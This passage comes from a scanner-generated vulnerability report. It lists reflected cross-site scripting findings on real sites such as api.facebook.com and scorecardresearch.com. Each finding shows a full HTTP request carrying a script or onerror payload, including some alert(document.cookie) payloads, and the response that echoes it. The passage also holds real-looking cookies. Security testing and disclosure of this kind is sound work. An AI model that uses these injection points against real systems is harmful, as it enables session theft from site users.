Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: imp=a$le#1295929623686_58666888_as2102_imp|285#1295929623686_58666888_as2102_imp|; Domain=.teracent.net; Expires=Sun, 24-Jul-2011 04:27:03 GMT; Path=/tase
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 25 Jan 2011 04:27:03 GMT
Content-Length: 18578

<!DOCTYPE html>
<!-- Host: as2102 -->
<html lang="en">
<head>
<meta charset="utf-8">
<meta http-equiv="cache-control" content="no-cache"/>
<meta http-equiv="pragma" content
...[SNIP]...
<a href="http://adserving.autotrader.com/event.ng/Type=clickc96b6"><script>alert(1)</script>bc28d8f1d07&FlightID=850600&AdID=2117284&TargetID=216438&ASeg=&AMod=&Segments=16718,17659,19280,19287,37200,41196,42568,51045,53802,93061,97293,107723,108064,112527,113656,116342,126077,132791,134700,140537,14119
...[SNIP]...

4.30. http://api.facebook.com/restserver.php [method parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.facebook.com
Path:   /restserver.php

Issue detail

The value of the method request parameter is copied into the HTML document as plain text between tags. The payload d8b18<img%20src%3da%20onerror%3dalert(1)>a927144b444 was submitted in the method parameter. This input was echoed as d8b18<img src=a onerror=alert(1)>a927144b444 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /restserver.php?format=json&method=links.getStatsd8b18<img%20src%3da%20onerror%3dalert(1)>a927144b444&urls=http%253A%252F%252Fstarscene.dailystar.com.lb%252Fmusic-scenea960d%252522%25253E%25253Cscript%25253Ealert(document.cookie)%25253C%252Fscript%25253Eb7d5247b69c%252F2010%252F11%252Fpianist-geoffrey-saba-performs-at-aubs-assembly-hall%252Fx22&callback=aptureJsonCallback0 HTTP/1.1
Host: api.facebook.com
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dla2day.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fwww.la2day.com%252Fcustom%252Fterm%252Fhealth_beauty9c672%252522%25253E%25253Cimg%252520src%25253da%252520onerror%25253dalert%2528document.cookie%2529%25253Ebcac4069246%252F576%26extra_2%3DUS; wd=300x250

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Type: text/javascript;charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-Cnection: close
Date: Mon, 24 Jan 2011 21:59:38 GMT
Content-Length: 486

aptureJsonCallback0({"error_code":3,"error_msg":"Unknown method","request_args":[{"key":"format","value":"json"},{"key":"method","value":"links.getStatsd8b18<img src=a onerror=alert(1)>a927144b444"},{"key":"urls","value":"http%3A%2F%2Fstarscene.dailystar.com.lb%2Fmusic-scenea960d%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Eb7d5247b69c%2F2010%2F11%2Fpianist-geoffrey-saba-pe
...[SNIP]...

4.31. http://api.facebook.com/restserver.php [urls parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.facebook.com
Path:   /restserver.php

Issue detail

The value of the urls request parameter is copied into the HTML document as plain text between tags. The payload 3c957<img%20src%3da%20onerror%3dalert(1)>bc6796fcbae was submitted in the urls parameter. This input was echoed as 3c957<img src=a onerror=alert(1)>bc6796fcbae in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /restserver.php?format=json&method=links.getStats&urls=http%253A%252F%252Fstarscene.dailystar.com.lb%252Fmusic-scenea960d%252522%25253E%25253Cscript%25253Ealert(document.cookie)%25253C%252Fscript%25253Eb7d5247b69c%252F2010%252F11%252Fpianist-geoffrey-saba-performs-at-aubs-assembly-hall%252Fx223c957<img%20src%3da%20onerror%3dalert(1)>bc6796fcbae&callback=aptureJsonCallback0 HTTP/1.1
Host: api.facebook.com
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dla2day.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fwww.la2day.com%252Fcustom%252Fterm%252Fhealth_beauty9c672%252522%25253E%25253Cimg%252520src%25253da%252520onerror%25253dalert%2528document.cookie%2529%25253Ebcac4069246%252F576%26extra_2%3DUS; wd=300x250

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=120
Content-Type: text/javascript;charset=utf-8
Expires: Mon, 24 Jan 2011 14:02:02 -0800
Pragma:
X-Cnection: close
Date: Mon, 24 Jan 2011 22:00:02 GMT
Content-Length: 644

aptureJsonCallback0([{"url":"http%3A%2F%2Fstarscene.dailystar.com.lb%2Fmusic-scenea960d%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Eb7d5247b69c%2F2010%2F11%2Fpianist-geoffrey-saba-performs-at-aubs-assembly-hall%2Fx223c957<img src=a onerror=alert(1)>bc6796fcbae","share_count":0,"like_count":0,"comment_count":0,"total_count":0,"click_count":0,"normalized_url":"http:\/\/starscene.dailystar.com.lb\/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C\/sc
...[SNIP]...

4.32. http://api.tweetmeme.com/url_info.jsonc [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.tweetmeme.com
Path:   /url_info.jsonc

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 71bc0<script>alert(1)</script>955adaf598b was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /url_info.jsonc?url=http%3A%2F%2Fstarscene.dailystar.com.lb%2Fmusic-scenea960d%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Eb7d5247b69c%2F2010%2F11%2Fpianist-geoffrey-saba-performs-at-aubs-assembly-hall%2Fx22&callback=aptureJsonCallback171bc0<script>alert(1)</script>955adaf598b HTTP/1.1
Host: api.tweetmeme.com
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Mon, 24 Jan 2011 21:58:59 GMT
Content-Type: text/html
Connection: close
P3P: CP="CAO PSA"
X-RateLimit-Limit: 400
X-RateLimit-Remaining: 377
X-Served-By: h03
Content-Length: 117

aptureJsonCallback171bc0<script>alert(1)</script>955adaf598b({"status":"failure","comment":"unable to resolve URL"});

4.33. http://autotrader.tt.omtrdc.net/m2/autotrader/mbox/standard [mbox parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://autotrader.tt.omtrdc.net
Path:   /m2/autotrader/mbox/standard

Issue detail

The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload e2e0e<script>alert(1)</script>1600fae3df4 was submitted in the mbox parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m2/autotrader/mbox/standard?mboxHost=www.autotrader.com&mboxSession=1295921983404-727382&mboxPage=1295921983404-727382&screenHeight=1200&screenWidth=1920&browserWidth=1155&browserHeight=1012&browserTimeOffset=-360&colorDepth=16&mboxCount=1&page=%2Findex.jsp&mbox=global_csse2e0e<script>alert(1)</script>1600fae3df4&mboxId=0&mboxTime=1295900383412&mboxURL=http%3A%2F%2Fwww.autotrader.com%2F%3Fbc4cb%2522%253balert(document.cookie)%2F%2F1ee177b82c%3D1&mboxReferrer=http%3A%2F%2Fburp%2Fshow%2F55&mboxVersion=39 HTTP/1.1
Host: autotrader.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://www.autotrader.com/?bc4cb%22%3balert(document.cookie)//1ee177b82c=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 206
Date: Tue, 25 Jan 2011 04:30:42 GMT
Server: Test & Target

mboxFactories.get('default').get('global_csse2e0e<script>alert(1)</script>1600fae3df4',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1295921983404-727382.17");

4.34. http://b.scorecardresearch.com/beacon.js [c1 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload d1e99<script>alert(1)</script>017bbe15adf was submitted in the c1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8d1e99<script>alert(1)</script>017bbe15adf&c2=3005693&c3=3&c4=http%3A%2F%2Fwww.tweetmeme.com&c5=&c6=&c10=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://tweetmeme.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Tue, 01 Feb 2011 04:27:32 GMT
Date: Tue, 25 Jan 2011 04:27:32 GMT
Connection: close
Content-Length: 3605

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
MSCORE.purge=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8d1e99<script>alert(1)</script>017bbe15adf", c2:"3005693", c3:"3", c4:"http://www.tweetmeme.com", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});

4.35. http://b.scorecardresearch.com/beacon.js [c10 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c10 request parameter is copied into the HTML document as plain text between tags. The payload cf572<script>alert(1)</script>be998e59288 was submitted in the c10 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=3005693&c3=3&c4=http%3A%2F%2Fwww.tweetmeme.com&c5=&c6=&c10=cf572<script>alert(1)</script>be998e59288&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://tweetmeme.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Tue, 01 Feb 2011 04:27:37 GMT
Date: Tue, 25 Jan 2011 04:27:37 GMT
Connection: close
Content-Length: 3605

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"3005693", c3:"3", c4:"http://www.tweetmeme.com", c5:"", c6:"", c10:"cf572<script>alert(1)</script>be998e59288", c15:"", c16:"", r:""});

4.36. http://b.scorecardresearch.com/beacon.js [c15 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c15 request parameter is copied into the HTML document as plain text between tags. The payload 3fa48<script>alert(1)</script>a33599a785c was submitted in the c15 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=3005693&c3=3&c4=http%3A%2F%2Fwww.tweetmeme.com&c5=&c6=&c10=&c15=3fa48<script>alert(1)</script>a33599a785c HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://tweetmeme.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Tue, 01 Feb 2011 04:27:38 GMT
Date: Tue, 25 Jan 2011 04:27:38 GMT
Connection: close
Content-Length: 3605

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
{f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"3005693", c3:"3", c4:"http://www.tweetmeme.com", c5:"", c6:"", c10:"", c15:"3fa48<script>alert(1)</script>a33599a785c", c16:"", r:""});

4.37. http://b.scorecardresearch.com/beacon.js [c2 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload 9ff59<script>alert(1)</script>ec861509ebc was submitted in the c2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=30056939ff59<script>alert(1)</script>ec861509ebc&c3=3&c4=http%3A%2F%2Fwww.tweetmeme.com&c5=&c6=&c10=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://tweetmeme.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Tue, 01 Feb 2011 04:27:33 GMT
Date: Tue, 25 Jan 2011 04:27:33 GMT
Connection: close
Content-Length: 3605

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
unction(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"30056939ff59<script>alert(1)</script>ec861509ebc", c3:"3", c4:"http://www.tweetmeme.com", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});

4.38. http://b.scorecardresearch.com/beacon.js [c3 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload d043f<script>alert(1)</script>72d7f31550d was submitted in the c3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=3005693&c3=3d043f<script>alert(1)</script>72d7f31550d&c4=http%3A%2F%2Fwww.tweetmeme.com&c5=&c6=&c10=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://tweetmeme.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Tue, 01 Feb 2011 04:27:34 GMT
Date: Tue, 25 Jan 2011 04:27:34 GMT
Connection: close
Content-Length: 3605

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"3005693", c3:"3d043f<script>alert(1)</script>72d7f31550d", c4:"http://www.tweetmeme.com", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});

4.39. http://b.scorecardresearch.com/beacon.js [c4 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload 9dfc1<script>alert(1)</script>ed1e8fa244a was submitted in the c4 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=3005693&c3=3&c4=http%3A%2F%2Fwww.tweetmeme.com9dfc1<script>alert(1)</script>ed1e8fa244a&c5=&c6=&c10=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://tweetmeme.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Tue, 01 Feb 2011 04:27:36 GMT
Date: Tue, 25 Jan 2011 04:27:36 GMT
Connection: close
Content-Length: 3605

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
ore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"3005693", c3:"3", c4:"http://www.tweetmeme.com9dfc1<script>alert(1)</script>ed1e8fa244a", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});

4.40. http://b.scorecardresearch.com/beacon.js [c5 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload 84bc2<script>alert(1)</script>2159a214127 was submitted in the c5 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=3005693&c3=3&c4=http%3A%2F%2Fwww.tweetmeme.com&c5=84bc2<script>alert(1)</script>2159a214127&c6=&c10=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://tweetmeme.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Tue, 01 Feb 2011 04:27:37 GMT
Date: Tue, 25 Jan 2011 04:27:37 GMT
Connection: close
Content-Length: 3605

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"3005693", c3:"3", c4:"http://www.tweetmeme.com", c5:"84bc2<script>alert(1)</script>2159a214127", c6:"", c10:"", c15:"", c16:"", r:""});

4.41. http://b.scorecardresearch.com/beacon.js [c6 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload 354be<script>alert(1)</script>f770b61399d was submitted in the c6 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=3005693&c3=3&c4=http%3A%2F%2Fwww.tweetmeme.com&c5=&c6=354be<script>alert(1)</script>f770b61399d&c10=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://tweetmeme.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Tue, 01 Feb 2011 04:27:37 GMT
Date: Tue, 25 Jan 2011 04:27:37 GMT
Connection: close
Content-Length: 3605

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
ngth-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"3005693", c3:"3", c4:"http://www.tweetmeme.com", c5:"", c6:"354be<script>alert(1)</script>f770b61399d", c10:"", c15:"", c16:"", r:""});

4.42. http://b3.mookie1.com/2/B3DM/DLX/1@x71 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/B3DM/DLX/1@x71

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c264"><script>alert(1)</script>21d6b206b37 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM5c264"><script>alert(1)</script>21d6b206b37/DLX/1@x71 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://dm.de.mookie1.com/2/B3DM/DLX/11596989115@x92?
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; NXCLICK2=011Pbk1ANX_CasaleB3/ATTWL/11Q1/MobRONRTG/300/1243587456!y!90!Ayp!Cly; id=914803576615380; RMFL=011PfKJbU106t6; NSC_o4efm_qppm_iuuq=ffffffff09419e2845525d5f4f58455e445a4a423660; Dominos=DataXuB3; RMFM=011PhXovU106w2; session=1295919344|1295919347

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:29:56 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 328
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/B3DM5c264"><script>alert(1)</script>21d6b206b37/DLX/1036330295/x71/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><IMG SR
...[SNIP]...

4.43. http://b3.mookie1.com/2/B3DM/DLX/1@x71 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/B3DM/DLX/1@x71

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb522"><script>alert(1)</script>402135baf54 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/DLXfb522"><script>alert(1)</script>402135baf54/1@x71 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://dm.de.mookie1.com/2/B3DM/DLX/11596989115@x92?
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
